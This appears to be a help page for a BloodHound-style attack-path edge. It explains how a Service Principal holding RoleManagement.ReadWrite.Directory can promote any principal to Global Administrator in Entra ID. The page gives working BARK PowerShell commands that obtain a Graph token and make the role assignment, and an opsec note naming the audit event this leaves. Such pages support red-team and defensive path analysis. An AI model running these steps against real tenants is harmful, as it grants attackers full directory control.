It is created against all Entra ID admin roles when a Service Principal has the following MS Graph app role assignment:

  • RoleManagement.ReadWrite.Directory

This privilege allows the Service Principal to promote itself or any other principal to any Entra ID admin role, including Global Administrator.

Abuse Info

To abuse this privilege, you can promote a principal you control to Global Administrator using BARK’s New-AzureADRoleAssignment. This function requires you to supply an MS Graph-scoped JWT associated with the Service Principal that has the privilege to grant Entra ID admin roles. There are several ways to acquire a JWT. For example, you may use BARK’s Get-MSGraphTokenWithClientCredentials to acquire an MS Graph-scoped JWT by supplying a Service Principal Client ID and secret:

$MGToken = Get-MSGraphTokenWithClientCredentials `

    -ClientID "34c7f844-b6d7-47f3-b1b8-720e0ecba49c" `

    -ClientSecret "asdf..." `

    -TenantName "contoso.onmicrosoft.com"

Then use BARK’s New-AzureADRoleAssignment function to grant the Entra ID role to your target principal:

New-AzureADRoleAssignment `

    -PrincipalID "6b6f9289-fe92-4930-a331-9575e0a4c1d8" `

    -RoleDefinitionId "62e90394-69f5-4237-9190-012177145e10" `

    -Token $MGToken

If successful, the output will include the principal ID, the role ID, and a unique ID for the role assignment.

Opsec Considerations

When you assign an Entra ID admin role to a principal using this privilege, the Azure Audit log will create an event called “Add member to role outside of PIM (permanent)”.

References

AZMGGrantAppRolesAZMGGroupMember_ReadWrite_All